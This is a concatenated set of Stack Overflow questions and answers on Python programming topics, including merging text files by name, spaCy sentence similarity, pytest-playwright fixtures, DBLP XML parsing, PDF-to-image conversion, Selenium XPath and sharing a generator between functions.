newfile.write(line)
Python - Combine text data from group of file by filename
I have below list of text files , I wanted to combine group of files like below Inv030001.txt - should have all data of files starting with Inv030001 Inv030002.txt - should have all data of files starting with Inv030002 I tried below code but it's not working filenames = glob(textfile_dir+'*.txt') for fname in filenames: filename = fname.split('\\')[-1] current_invoice_number = (filename.split('_')[0]).split('.')[0] prev_invoice_number = current_invoice_number with open(textfile_dir + current_invoice_number+'.txt', 'w') as outfile: for eachfile in fnmatch.filter(os.listdir(textfile_dir), '*[!'+current_invoice_number+'].txt'): current_invoice_number = (eachfile.split('_')[0]).split('.')[0] if(current_invoice_number == prev_invoice_number): with open(textfile_dir+eachfile) as infile: for line in infile: outfile.write(line) prev_invoice_number = current_invoice_number else: with open(textfile_dir+eachfile) as infile: for line in infile: outfile.write(line) prev_invoice_number = current_invoice_number #break;
[ "Does this answer your question? My version will append the data from \"like\" invoice numbers to a .txt file named with just the invoice number. In other words, anything that starts with \"Inv030001\" will have it's contents appended to \"Inv030001.txt\". The idea being that you likely don't want to overwrite files and possibly destroy them if your write logic had a mistake.\nI actually recreated your files to test this. I did exactly what I suggested you do. I just treated every part as a separate task and built it up to this, and in doing that the script became far less verbose and convoluted. I labeled all of my comments with task to pound it in that this is just a series of very simple things.\nI also renamed your vars to what they actually are. For instance, filenames aren't filenames, at all. They are entire paths.\nimport os\nfrom glob import glob\n\n#you'll have to change this path to yours\nroot = os.path.join(os.getcwd(), 'texts/')\n\n#sorting this may be redundant \npaths = sorted(glob(root+'*.txt'))\n\nfor path in paths:\n #task: get filename\n filename = path.split('\\\\')[-1]\n #task: get invoice number\n invnum = filename.split('_')[0]\n #task: open in and out files\n with open(f'{root}{invnum}.txt', 'a') as out_, open(path, 'r') as in_:\n #task: append in contents to out\n out_.write(in_.read())\n\n", "Your code may have had a little too much complications in it. And so, the idea is that for every file in the directory, just add it's contents (that is, append) to the invoice file.\nfrom glob import glob, fnmatch\nimport os\ntextfile_dir=\"invs\" + os.sep # # I changed this to os.sep since I'm on a MAC - hopefully works in windows, too\nfilenames = glob(textfile_dir+'*.txt')\nfor fname in filenames:\n filename = fname.split(os.sep)[-1] \n current_invoice_number = (filename.split('_')[0]).split('.')[0]\n with open(textfile_dir + current_invoice_number+'.txt', 'a') as outfile:\n with open(fname) as infile:\n for line in infile:\n outfile.write(line)\n\nSome room for improvement:\n\nIf you created your accumulation files in a different directory, there would be less of a chance of you picking them up when you run this program again (we are using append 'a' when we open the files for writing.\nThe order of the files is not preserved with glob (AFAIK). This may not be great for having deterministic results.\n\n", "Below is the working code, if someone is looking for same solution\nfilenames = glob(textfile_dir+'*.txt')\ndd = defaultdict(list)\nfor filename in filenames:\nname, ext = os.path.splitext(filename)\nname = name.split('\\\\')[-1].split('_')[0]\ndd[name].append(filename)\n\nfor key, fnames in dd.items():\nwith open(textfile_dir+key+'.txt', \"w\") as newfile:\n for line in fileinput.FileInput(fnames):\n newfile.write(line)\n\n" ]
[ 1, 0, 0 ]
[]
[]
[ "python", "text_files" ]
stackoverflow_0074592543_python_text_files.txt
Q: Spacy, Strange similarity between two sentences I have downloaded en_core_web_lg model and trying to find similarity between two sentences: nlp = spacy.load('en_core_web_lg') search_doc = nlp("This was very strange argument between american and british person") main_doc = nlp("He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.") print(main_doc.similarity(search_doc)) Which returns very strange value: 0.9066019751888448 These two sentences should not be 90% similar they have very different meanings. Why this is happening? Do I need to add some kind of additional vocabulary in order to make similarity result more reasonable? A: Spacy constructs sentence embedding by averaging the word embeddings. Since, in an ordinary sentence, there are a lot of meaningless words (called stop words), you get poor results. You can remove them like this: search_doc = nlp("This was very strange argument between american and british person") main_doc = nlp("He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.") search_doc_no_stop_words = nlp(' '.join([str(t) for t in search_doc if not t.is_stop])) main_doc_no_stop_words = nlp(' '.join([str(t) for t in main_doc if not t.is_stop])) print(search_doc_no_stop_words.similarity(main_doc_no_stop_words)) or only keep nouns, since they have the most information: doc_nouns = nlp(' '.join([str(t) for t in doc if t.pos_ in ['NOUN', 'PROPN']])) A: The Spacy documentation for vector similarity explains the basic idea of it: Each word has a vector representation, learned by contextual embeddings (Word2Vec), which are trained on the corpora, as explained in the documentation. Now, the word embedding of a full sentence is simply the average over all different words. If you now have a lot of words that semantically lie in the same region (as for example filler words like "he", "was", "this", ...), and the additional vocabulary "cancels out", then you might end up with a similarity as seen in your case. The question is rightfully what you can do about it: From my perspective, you could come up with a more complex similarity measure. As the search_doc and main_doc have additional information, like the original sentence, you could modify the vectors by a length difference penalty, or alternatively try to compare shorter pieces of the sentence, and compute pairwise similarities (then again, the question would be which parts to compare). For now, there is no clean way to simply resolve this issue, sadly. A: As noted by others, you may want to use Universal Sentence Encoder or Infersent. For Universal Sentence Encoder, you can install pre-built SpaCy models that manage the wrapping of TFHub, so that you just need to install the package with pip so that the vectors and similarity will work as expected. You can follow the instruction of this repository (I am the author) https://github.com/MartinoMensio/spacy-universal-sentence-encoder-tfhub Install the model: pip install https://github.com/MartinoMensio/spacy-universal-sentence-encoder/releases/download/v0.4.3/en_use_md-0.4.3.tar.gz#en_use_md-0.4.3 Load and use the model import spacy # this loads the wrapper nlp = spacy.load('en_use_md') # your sentences search_doc = nlp("This was very strange argument between american and british person") main_doc = nlp("He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.") print(main_doc.similarity(search_doc)) # this will print 0.310783598221594 A: As pointed out by @dennlinger, Spacy's sentence embeddings are just the average of all word vector embeddings taken individually. So if you have a sentence with negating words like "good" and "bad" their vectors might cancel each other out resulting in not so good contextual embeddings. If your usecase is specific to get sentence embeddings then you should try out below SOTA approaches. Google's Universal Sentence Encoder: https://tfhub.dev/google/universal-sentence-encoder/2 Facebook's Infersent Encoder: https://github.com/facebookresearch/InferSent I have tried both these embeddings and gives you good results to start with most of the times and use word embeddings as a base for building sentence embeddings. Cheers! A: Now Universal Sentence Encoder available on spaCy official site: https://spacy.io/universe/project/spacy-universal-sentence-encoder 1. Installation: pip install spacy-universal-sentence-encoder 2. Code example: import spacy_universal_sentence_encoder # load one of the models: ['en_use_md', 'en_use_lg', 'xx_use_md', 'xx_use_lg'] nlp = spacy_universal_sentence_encoder.load_model('en_use_lg') # get two documents doc_1 = nlp('Hi there, how are you?') doc_2 = nlp('Hello there, how are you doing today?') # use the similarity method that is based on the vectors, on Doc, Span or Token print(doc_1.similarity(doc_2[0:7]))
Spacy, Strange similarity between two sentences
I have downloaded en_core_web_lg model and trying to find similarity between two sentences: nlp = spacy.load('en_core_web_lg') search_doc = nlp("This was very strange argument between american and british person") main_doc = nlp("He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.") print(main_doc.similarity(search_doc)) Which returns very strange value: 0.9066019751888448 These two sentences should not be 90% similar they have very different meanings. Why this is happening? Do I need to add some kind of additional vocabulary in order to make similarity result more reasonable?
[ "Spacy constructs sentence embedding by averaging the word embeddings. Since, in an ordinary sentence, there are a lot of meaningless words (called stop words), you get poor results. You can remove them like this: \nsearch_doc = nlp(\"This was very strange argument between american and british person\")\nmain_doc = nlp(\"He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.\")\n\nsearch_doc_no_stop_words = nlp(' '.join([str(t) for t in search_doc if not t.is_stop]))\nmain_doc_no_stop_words = nlp(' '.join([str(t) for t in main_doc if not t.is_stop]))\n\nprint(search_doc_no_stop_words.similarity(main_doc_no_stop_words))\n\nor only keep nouns, since they have the most information:\ndoc_nouns = nlp(' '.join([str(t) for t in doc if t.pos_ in ['NOUN', 'PROPN']]))\n\n", "The Spacy documentation for vector similarity explains the basic idea of it:\nEach word has a vector representation, learned by contextual embeddings (Word2Vec), which are trained on the corpora, as explained in the documentation.\nNow, the word embedding of a full sentence is simply the average over all different words. If you now have a lot of words that semantically lie in the same region (as for example filler words like \"he\", \"was\", \"this\", ...), and the additional vocabulary \"cancels out\", then you might end up with a similarity as seen in your case.\nThe question is rightfully what you can do about it: From my perspective, you could come up with a more complex similarity measure. As the search_doc and main_doc have additional information, like the original sentence, you could modify the vectors by a length difference penalty, or alternatively try to compare shorter pieces of the sentence, and compute pairwise similarities (then again, the question would be which parts to compare).\nFor now, there is no clean way to simply resolve this issue, sadly.\n", "As noted by others, you may want to use Universal Sentence Encoder or Infersent.\nFor Universal Sentence Encoder, you can install pre-built SpaCy models that manage the wrapping of TFHub, so that you just need to install the package with pip so that the vectors and similarity will work as expected.\nYou can follow the instruction of this repository (I am the author) https://github.com/MartinoMensio/spacy-universal-sentence-encoder-tfhub\n\nInstall the model: pip install https://github.com/MartinoMensio/spacy-universal-sentence-encoder/releases/download/v0.4.3/en_use_md-0.4.3.tar.gz#en_use_md-0.4.3\n\nLoad and use the model\n\n\nimport spacy\n# this loads the wrapper\nnlp = spacy.load('en_use_md')\n\n# your sentences\nsearch_doc = nlp(\"This was very strange argument between american and british person\")\n\nmain_doc = nlp(\"He was from Japan, but a true English gentleman in my eyes, and another one of the reasons as to why I liked going to school.\")\n\nprint(main_doc.similarity(search_doc))\n# this will print 0.310783598221594\n\n\n", "As pointed out by @dennlinger, Spacy's sentence embeddings are just the average of all word vector embeddings taken individually. So if you have a sentence with negating words like \"good\" and \"bad\" their vectors might cancel each other out resulting in not so good contextual embeddings. If your usecase is specific to get sentence embeddings then you should try out below SOTA approaches.\n\nGoogle's Universal Sentence Encoder: https://tfhub.dev/google/universal-sentence-encoder/2\nFacebook's Infersent Encoder: https://github.com/facebookresearch/InferSent\n\nI have tried both these embeddings and gives you good results to start with most of the times and use word embeddings as a base for building sentence embeddings.\nCheers!\n", "Now Universal Sentence Encoder available on spaCy official site: https://spacy.io/universe/project/spacy-universal-sentence-encoder\n1. Installation:\npip install spacy-universal-sentence-encoder\n\n2. Code example:\nimport spacy_universal_sentence_encoder\n# load one of the models: ['en_use_md', 'en_use_lg', 'xx_use_md', 'xx_use_lg']\nnlp = spacy_universal_sentence_encoder.load_model('en_use_lg')\n# get two documents\ndoc_1 = nlp('Hi there, how are you?')\ndoc_2 = nlp('Hello there, how are you doing today?')\n# use the similarity method that is based on the vectors, on Doc, Span or Token\nprint(doc_1.similarity(doc_2[0:7]))\n\n" ]
[ 31, 15, 10, 5, 3 ]
[]
[]
[ "nlp", "python", "spacy" ]
stackoverflow_0052113939_nlp_python_spacy.txt
Q: fixture 'page' not found - pytest playwright I started learning playwright and from documentation (https://playwright.dev/python/docs/intro) tried to to run the following sample code: import re from playwright.sync_api import Page, expect def test_pp(page: Page): page.goto("https://playwright.dev/") # Expect a title "to contain" a substring. expect(page).to_have_title(re.compile("Playwright")) # create a locator get_started = page.locator("text=Get Started") # Expect an attribute "to be strictly equal" to the value. expect(get_started).to_have_attribute("href", "/docs/intro") # Click the get started link. get_started.click() # Expects the URL to contain intro. expect(page).to_have_url(re.compile(".*intro")) While running using command pytest, throwing following error: file D:\play_wright\test\test_sample.py, line 5 def test_pp(page: Page): E fixture 'page' not found > available fixtures: cache, capfd, capfdbinary, caplog, capsys, capsysbinary, doctest_namespace, monkeypatch, pytestconfig, record_property, record_testsuite_property, record_xml_attribute, recwarn, tmp_path, tmp_path_factory, tmpdir, tmpdir_factory > use 'pytest --fixtures [testpath]' for help on them. D:\play_wright\test\test_sample.py:5 pytest-playwright module (0.3.0) is installed. confirmed with pip list command Restarted Widows Machine playwright version - 1.27.1 pytest - 6.2.1 (tried with 7.* as well) Still getting the issue. please help. A: Try the following: py.test test_.py
fixture 'page' not found - pytest playwright
I started learning playwright and from documentation (https://playwright.dev/python/docs/intro) tried to to run the following sample code: import re from playwright.sync_api import Page, expect def test_pp(page: Page): page.goto("https://playwright.dev/") # Expect a title "to contain" a substring. expect(page).to_have_title(re.compile("Playwright")) # create a locator get_started = page.locator("text=Get Started") # Expect an attribute "to be strictly equal" to the value. expect(get_started).to_have_attribute("href", "/docs/intro") # Click the get started link. get_started.click() # Expects the URL to contain intro. expect(page).to_have_url(re.compile(".*intro")) While running using command pytest, throwing following error: file D:\play_wright\test\test_sample.py, line 5 def test_pp(page: Page): E fixture 'page' not found > available fixtures: cache, capfd, capfdbinary, caplog, capsys, capsysbinary, doctest_namespace, monkeypatch, pytestconfig, record_property, record_testsuite_property, record_xml_attribute, recwarn, tmp_path, tmp_path_factory, tmpdir, tmpdir_factory > use 'pytest --fixtures [testpath]' for help on them. D:\play_wright\test\test_sample.py:5 pytest-playwright module (0.3.0) is installed. confirmed with pip list command Restarted Widows Machine playwright version - 1.27.1 pytest - 6.2.1 (tried with 7.* as well) Still getting the issue. please help.
[ "Try the following:\n\npy.test test_.py\n\n" ]
[ 1 ]
[]
[]
[ "playwright", "playwright_python", "pytest", "python" ]
stackoverflow_0074135518_playwright_playwright_python_pytest_python.txt
Q: Parse and Query Large XML File Using Python I am working on a project for which I have to parse and query a relatively large xml file in python. I am using a dataset with data about scientific articles. The dataset can be found via this link (https://dblp.uni-trier.de/xml/dblp.xml.gz). There are 7 types of entries in the dataset: article, inproceedings, proceedings, book, incollection, phdthesis and masterthesis. An entry has the following attributes: author, title, year and either journal or booktitle. I am looking for the best way to parse this and consequently perform queries on the dataset. Examples of queries that I would like to perform are: retrieve articles that have a certain author retrieve articles if the title contains a certain word retrieve articles to which author x and author y both contributed. ... Herewith a snapshot of an entry in the xml file: <article mdate="2020-06-25" key="tr/meltdown/s18" publtype="informal"> <author>Paul Kocher</author> <author>Daniel Genkin</author> <author>Daniel Gruss</author> <author>Werner Haas 0004</author> <author>Mike Hamburg</author> <author>Moritz Lipp</author> <author>Stefan Mangard</author> <author>Thomas Prescher 0002</author> <author>Michael Schwarz 0001</author> <author>Yuval Yarom</author> <title>Spectre Attacks: Exploiting Speculative Execution.</title> <journal>meltdownattack.com</journal> <year>2018</year> <ee type="oa">https://spectreattack.com/spectre.pdf</ee> </article> Does anybody have an idea on how to do to this efficiently? I have experimented with using the ElementTree. However, when parsing the file I get the following error: xml.etree.ElementTree.ParseError: undefined entity &Ouml;: line 90, column 17 Additionally, I am not sure if using the ElementTree will be the most efficient way for querying this xml file. A: If the file is large, and you want to perform multiple queries, then you don't want to be parsing the file and building a tree in memory every time you do a query. You also don't want to be writing the queries in low-level Python, you need a proper query language. You should be loading the data into an XML database such as BaseX or ExistDB. You can then query it using XQuery. This will be a bit more effort to set up, but will make your life a lot easier in the long run. A: Please share your code as a minimal example, how should we know otherwise where the error message comes from. What do you find in Line 90? The message sounds like a encoding problem. I suggest use ˋentree.iterparse()ˋ and pandas or a sqlite3 database. After that you can easy search by SQL.
Parse and Query Large XML File Using Python
I am working on a project for which I have to parse and query a relatively large xml file in python. I am using a dataset with data about scientific articles. The dataset can be found via this link (https://dblp.uni-trier.de/xml/dblp.xml.gz). There are 7 types of entries in the dataset: article, inproceedings, proceedings, book, incollection, phdthesis and masterthesis. An entry has the following attributes: author, title, year and either journal or booktitle. I am looking for the best way to parse this and consequently perform queries on the dataset. Examples of queries that I would like to perform are: retrieve articles that have a certain author retrieve articles if the title contains a certain word retrieve articles to which author x and author y both contributed. ... Herewith a snapshot of an entry in the xml file: <article mdate="2020-06-25" key="tr/meltdown/s18" publtype="informal"> <author>Paul Kocher</author> <author>Daniel Genkin</author> <author>Daniel Gruss</author> <author>Werner Haas 0004</author> <author>Mike Hamburg</author> <author>Moritz Lipp</author> <author>Stefan Mangard</author> <author>Thomas Prescher 0002</author> <author>Michael Schwarz 0001</author> <author>Yuval Yarom</author> <title>Spectre Attacks: Exploiting Speculative Execution.</title> <journal>meltdownattack.com</journal> <year>2018</year> <ee type="oa">https://spectreattack.com/spectre.pdf</ee> </article> Does anybody have an idea on how to do to this efficiently? I have experimented with using the ElementTree. However, when parsing the file I get the following error: xml.etree.ElementTree.ParseError: undefined entity &Ouml;: line 90, column 17 Additionally, I am not sure if using the ElementTree will be the most efficient way for querying this xml file.
[ "If the file is large, and you want to perform multiple queries, then you don't want to be parsing the file and building a tree in memory every time you do a query. You also don't want to be writing the queries in low-level Python, you need a proper query language.\nYou should be loading the data into an XML database such as BaseX or ExistDB. You can then query it using XQuery. This will be a bit more effort to set up, but will make your life a lot easier in the long run.\n", "Please share your code as a minimal example, how should we know otherwise where the error message comes from. What do you find in Line 90? The message sounds like a encoding problem. I suggest use ˋentree.iterparse()ˋ and pandas or a sqlite3 database. After that you can easy search by SQL.\n" ]
[ 0, 0 ]
[]
[]
[ "data_mining", "python", "xml" ]
stackoverflow_0074467660_data_mining_python_xml.txt
Q: Convert multiple multipage PDFs to JPGs in subfolders Simple use case: A folder with many (mostly multipage) PDF files. A script should convert each PDF page to JPG and store it in a subfolder named after the PDF filename. (e.g. #33.pdf to folder #33) Single JPG files should also have this filename plus a counter mirroring the sequential page number in the PDF. (e.g. #33_001.jpg) I found a bounch of related questions, but nothing that quite does what I want, e.g. How do I convert multiple PDFs into images from the same folder in Python? A python script would work fine, but also any other way to do this in Win10 (imagemagick, e.g.) is cool with me. A: Your comment requests how a batch can do as required, for simplicity the following only processes a single file so Python will need to loop through a folder and call with each name in turn. That could be done by adding a "for loop" in batch but first see where problems arise, as many of my single test files threw differing errors. I have tried to cover several fails in this batch file, in my system, but there can still be issues such as a file that has no valid fonts to display For most recent poppler windows 64bit utils see https://github.com/oschwartz10612/poppler-windows/releases/ for 32 bit use xpdf latest version http://www.xpdfreader.com/download.html but that has direct pdftopng.exe so needs a few edits. pdf2dir.bat @echo off set "bin=C:\Apps\PDF\poppler\22.11.0\Library\bin" set "res=200" REM for type use one of 3 i.e. png jpeg jpegcmyk (PNG is best for documents) set "type=png" if exist "%~dpn1\*.%type%" echo: &echo Files already exist in "%~dpn1" skipping overwrite&goto pause if not exist "%~dpn1.pdf" echo: &echo "%~dpn0" File "%~dpn1.pdf" not found&goto pause if not exist "%~dpn1\*.*" md "%~dpn1" REM following line deliberately opens folder to show progress delete it or prefix with REM for blind running explorer "%~dpn1" "%bin%\pdftoppm.exe" -%type% -r %res% "%~dpn1.pdf" "%~dpn1\%~n1" if %errorlevel%==1 echo: &echo Build of %type% files failed&goto pause if not exist "%~dpn1\*.%type%" echo: &echo Build of %type% files failed&goto pause :pause echo: pause :end It requires Poppler binaries path to pdftoppm be correctly set in the second line It can be placed wherever desired i.e. work folder or desktop It allows for drag and drop of one pdf on top will (should work) without need to run in console Can be run in a command console and place a space character after, you can drag and drop a single filename but any spaces in name must be "double quoted" can be run from any shell or OS command as "path to/batchfile.bat" "c:\path to\file.pdf"
Convert multiple multipage PDFs to JPGs in subfolders
Simple use case: A folder with many (mostly multipage) PDF files. A script should convert each PDF page to JPG and store it in a subfolder named after the PDF filename. (e.g. #33.pdf to folder #33) Single JPG files should also have this filename plus a counter mirroring the sequential page number in the PDF. (e.g. #33_001.jpg) I found a bounch of related questions, but nothing that quite does what I want, e.g. How do I convert multiple PDFs into images from the same folder in Python? A python script would work fine, but also any other way to do this in Win10 (imagemagick, e.g.) is cool with me.
[ "Your comment requests how a batch can do as required, for simplicity the following only processes a single file so Python will need to loop through a folder and call with each name in turn. That could be done by adding a \"for loop\" in batch but first see where problems arise, as many of my single test files threw differing errors.\nI have tried to cover several fails in this batch file, in my system, but there can still be issues such as a file that has no valid fonts to display\n\nFor most recent poppler windows 64bit utils see https://github.com/oschwartz10612/poppler-windows/releases/ for 32 bit use xpdf latest version http://www.xpdfreader.com/download.html but that has direct pdftopng.exe so needs a few edits.\npdf2dir.bat\n@echo off\nset \"bin=C:\\Apps\\PDF\\poppler\\22.11.0\\Library\\bin\"\nset \"res=200\"\nREM for type use one of 3 i.e. png jpeg jpegcmyk (PNG is best for documents)\nset \"type=png\"\n\nif exist \"%~dpn1\\*.%type%\" echo: &echo Files already exist in \"%~dpn1\" skipping overwrite&goto pause\nif not exist \"%~dpn1.pdf\" echo: &echo \"%~dpn0\" File \"%~dpn1.pdf\" not found&goto pause\n\nif not exist \"%~dpn1\\*.*\" md \"%~dpn1\"\n\nREM following line deliberately opens folder to show progress delete it or prefix with REM for blind running\nexplorer \"%~dpn1\"\n\n\"%bin%\\pdftoppm.exe\" -%type% -r %res% \"%~dpn1.pdf\" \"%~dpn1\\%~n1\"\nif %errorlevel%==1 echo: &echo Build of %type% files failed&goto pause\nif not exist \"%~dpn1\\*.%type%\" echo: &echo Build of %type% files failed&goto pause\n\n:pause\necho:\npause\n:end\n\n\n\nIt requires Poppler binaries path to pdftoppm be correctly set in the second line\nIt can be placed wherever desired i.e. work folder or desktop\nIt allows for drag and drop of one pdf on top will (should work) without need to run in console\nCan be run in a command console and place a space character after, you can drag and drop a single filename but any spaces in name must be \"double quoted\"\ncan be run from any shell or OS command as \"path to/batchfile.bat\" \"c:\\path to\\file.pdf\"\n\n" ]
[ 0 ]
[]
[]
[ "batch_processing", "image", "imagemagick", "pdf", "python" ]
stackoverflow_0074546533_batch_processing_image_imagemagick_pdf_python.txt
Q: VSCode Kernel Selector when clicked does not display any options Despite having multiple interpreters available (3.10.8, 3.9.13 from anaconda), whenever I click "Select Kernel" in my ipynb notebook, nothing comes up except for "Install suggested extensions Python + Jupyter," none of which are helpful since I already have the suggested extensions installed. Does anyone know how I can appropriately select a kernel here? A: I uninstalled, then reinstalled VSCode. base (Python 3.9.13) was instantly selected for me upon opening the reinstalled version of VSC.
VSCode Kernel Selector when clicked does not display any options
Despite having multiple interpreters available (3.10.8, 3.9.13 from anaconda), whenever I click "Select Kernel" in my ipynb notebook, nothing comes up except for "Install suggested extensions Python + Jupyter," none of which are helpful since I already have the suggested extensions installed. Does anyone know how I can appropriately select a kernel here?
[ "I uninstalled, then reinstalled VSCode. base (Python 3.9.13) was instantly selected for me upon opening the reinstalled version of VSC.\n" ]
[ 0 ]
[]
[]
[ "anaconda", "jupyter_notebook", "kernel", "python", "visual_studio_code" ]
stackoverflow_0074592584_anaconda_jupyter_notebook_kernel_python_visual_studio_code.txt
Q: How to find an element under located header using python selenium With selenium in python, I want to collect data about a user called "Graham" on the website below: https://github.com/GrahamDumpleton/wrapt/graphs/contributors Following the previous question, I located the header including the name "Graham" by finding XPath: driver.find_elements(By.XPATH, "//h3[contains(@class,'border-bottom')][contains(.,'Graham')]") How could I find an element under this located header? The XPath is: //*[@id="contributors"]/ol/li/span/h3/span[2]/span/div/a Thank you. A: The element you looking for can be uniquely located by the following XPath: //a[contains(.,'commit')]. So, if you want to locate directly all the commit amounts of users on the page this can be done as following: commits = driver.find_elements(By.XPATH, "//a[contains(.,'commit')]") for commit in commits: print(commit.text) And if you want to locate the commits amount per specific user when you already located the user's block or header element as we do in the previous question, this can be done as following: header = driver.find_elements(By.XPATH, "//h3[contains(@class,'border-bottom')][contains(.,'Graham')]") commit = header.find_element(By.XPATH, ".//a[contains(.,'commit')]") print(commit.text) Pay attention. Here header.find_element(By.XPATH, ".//a[contains(.,'commit')]") we applied find_element method on header web element object, not on the driver object. We use a dot . at the beginning of the XPath to start searching from the current node (header), not from the beginning of the entire DOM. UPD addition can be located with this XPath: //span[@class='cmeta']//span[contains(.,'++')] and deletion with //span[@class='cmeta']//span[contains(.,'--')] A: Xpath expression (//*[@class="border-bottom p-2 lh-condensed"])[1] will select indivisual profile Example: from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.chrome.service import Service import time webdriver_service = Service("./chromedriver") #Your chromedriver path driver = webdriver.Chrome(service=webdriver_service) driver.get('https://github.com/GrahamDumpleton/wrapt/graphs/contributors') driver.maximize_window() time.sleep(5) n = driver.find_element(By.XPATH,'(//*[@class="border-bottom p-2 lh-condensed"])[1]') name= n.find_element(By.XPATH, './/a[@class="text-normal"]').text print(name) Output: GrahamDumpleton
How to find an element under located header using python selenium
With selenium in python, I want to collect data about a user called "Graham" on the website below: https://github.com/GrahamDumpleton/wrapt/graphs/contributors Following the previous question, I located the header including the name "Graham" by finding XPath: driver.find_elements(By.XPATH, "//h3[contains(@class,'border-bottom')][contains(.,'Graham')]") How could I find an element under this located header? The XPath is: //*[@id="contributors"]/ol/li/span/h3/span[2]/span/div/a Thank you.
[ "The element you looking for can be uniquely located by the following XPath: //a[contains(.,'commit')].\nSo, if you want to locate directly all the commit amounts of users on the page this can be done as following:\ncommits = driver.find_elements(By.XPATH, \"//a[contains(.,'commit')]\")\nfor commit in commits:\n print(commit.text)\n\nAnd if you want to locate the commits amount per specific user when you already located the user's block or header element as we do in the previous question, this can be done as following:\nheader = driver.find_elements(By.XPATH, \"//h3[contains(@class,'border-bottom')][contains(.,'Graham')]\")\ncommit = header.find_element(By.XPATH, \".//a[contains(.,'commit')]\")\nprint(commit.text)\n\nPay attention.\n\nHere header.find_element(By.XPATH, \".//a[contains(.,'commit')]\") we applied find_element method on header web element object, not on the driver object.\nWe use a dot . at the beginning of the XPath to start searching from the current node (header), not from the beginning of the entire DOM.\n\nUPD\naddition can be located with this XPath: //span[@class='cmeta']//span[contains(.,'++')] and deletion with //span[@class='cmeta']//span[contains(.,'--')]\n", "Xpath expression (//*[@class=\"border-bottom p-2 lh-condensed\"])[1] will select indivisual profile\nExample:\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nimport time\n\nwebdriver_service = Service(\"./chromedriver\") #Your chromedriver path\ndriver = webdriver.Chrome(service=webdriver_service)\n\ndriver.get('https://github.com/GrahamDumpleton/wrapt/graphs/contributors')\ndriver.maximize_window()\ntime.sleep(5)\n\nn = driver.find_element(By.XPATH,'(//*[@class=\"border-bottom p-2 lh-condensed\"])[1]')\nname= n.find_element(By.XPATH, './/a[@class=\"text-normal\"]').text\nprint(name)\n\nOutput:\nGrahamDumpleton\n\n" ]
[ 1, 1 ]
[]
[]
[ "python", "selenium", "selenium_webdriver", "web_scraping", "xpath" ]
stackoverflow_0074593047_python_selenium_selenium_webdriver_web_scraping_xpath.txt
Q: How to gather all chats a Telegram bot is an admin of? How is it possible to get all chats in the form of a iterabale object (list-like) or iterate over all possible chats the bot is an admin/participant of (using python-telegram-bot)? Is there a python-telegram-bot method for getting all chats a bot is a admin/participant of? A: No, there is not, because the Telegram Bot API does not provide such a method. You can use the Update.my_chat_member updates to keep track of that. See here for an example on how that can be done using python-telgeram-bot. Disclaimer: I'm currently the maintainer of python-telegram-bot.
How to gather all chats a Telegram bot is an admin of?
How is it possible to get all chats in the form of a iterabale object (list-like) or iterate over all possible chats the bot is an admin/participant of (using python-telegram-bot)? Is there a python-telegram-bot method for getting all chats a bot is a admin/participant of?
[ "No, there is not, because the Telegram Bot API does not provide such a method. You can use the Update.my_chat_member updates to keep track of that. See here for an example on how that can be done using python-telgeram-bot.\n\nDisclaimer: I'm currently the maintainer of python-telegram-bot.\n" ]
[ 1 ]
[]
[]
[ "iterable", "python", "python_3.x", "python_telegram_bot", "telegram_bot" ]
stackoverflow_0074591204_iterable_python_python_3.x_python_telegram_bot_telegram_bot.txt
Q: Two functions, One generator I have two functions which both take iterators as inputs. Is there a way to write a generator which I can supply to both functions as input, which would not require a reset or a second pass through? I want to do one pass over the data, but supply the output to two functions: Example: def my_generator(data): for row in data: yield row gen = my_generator(data) func1(gen) func2(gen) I know I could have two different generator instances, or reset in between functions, but was wondering if there is a way to avoid doing two passes on the data. Note that func1/func2 themselves are NOT generators, which would be nice cause I could then have a pipeline. The point here is to try and avoid a second pass over the data. A: Python has an amazing catalog of handy functions. You find the ones related to iterators in itertools: import itertools def my_generator(data): for row in data: yield row gen = my_generator(data) gen1, gen2 = itertools.tee(gen) func1(gen1) func2(gen2) However, this only makes sense if func1 and func2 don't consume all the elements, because if they do itertools.tee()has to remember all the elements in genuntil gen2 is used. To get around this, use only a few elements at a time. Or change func1 to call func2. Or maybe even change func1 to be a lazy generator which returns the input and just pipe that into func2. A: You can either cache generators result into a list, or reset the generator to pass data into func2. The problem is that if one have 2 loops, one needs to iterate over the data twice, so either one loads the data again and create a generator or one caches the entire result. Solutions like itertools.tee will also just create 2 iteratvies, which is basically the same as resetting the generator after first iteration. Of course it is syntactic sugar but it won't change the situation in the background. If you have big data here, you have to merge func1 and func2. for a in gen: f1(a) f2(a) In practice it can be a good idea to design code like this, so one has full control over iteration process and is able associate/compose maps and filters using a single iterative. A: If using threads is an option, the generator may be consumed just once without having to store a possibly unpredictable number of yielded values between calls to the consumers. The following example runs the consumers in lock-step; Python 3.2 or later is needed for this implementation: import threading def generator(): for x in range(10): print('generating {}'.format(x)) yield x def tee(iterable, n=2): barrier = threading.Barrier(n) state = dict(value=None, stop_iteration=False) def repeat(): while True: if barrier.wait() == 0: try: state.update(value=next(iterable)) except StopIteration: state.update(stop_iteration=True) barrier.wait() if state['stop_iteration']: break yield state['value'] return tuple(repeat() for i in range(n)) def func1(iterable): for x in iterable: print('func1 consuming {}'.format(x)) def func2(iterable): for x in iterable: print('func2 consuming {}'.format(x)) gen1, gen2 = tee(generator(), 2) thread1 = threading.Thread(target=func1, args=(gen1,)) thread1.start() thread2 = threading.Thread(target=func2, args=(gen2,)) thread2.start() thread1.join() thread2.join() A: It is a little bit too late, but maybe will be helpful for someone. For simplicity I have added only one ChildClass, but the idea is to have multiple of them: class BaseClass: def on_yield(self, value: int): raise NotImplementedError() def summary(self): raise NotImplementedError() class ChildClass(BaseClass): def __init__(self): self._aggregated_value = 0 def on_yield(self, value: int): self._aggregated_value += value def summary(self): print(f"Aggregated value={self._aggregated_value}") class Generator(): def my_generator(self, data): for row in data: yield row def calculate(self, generator, classes): for index, value in enumerate(generator): print(f"index={index}") [_class.on_yield(value) for _class in classes] [_class.summary() for _class in classes] if __name__ == '__main__': child_classes = [ ChildClass(), ChildClass() ] generator = Generator() my_generator = generator.my_generator([1, 2, 3]) generator.calculate(my_generator, child_classes) The output of this is: index=0 index=1 index=2 Aggregated value=6 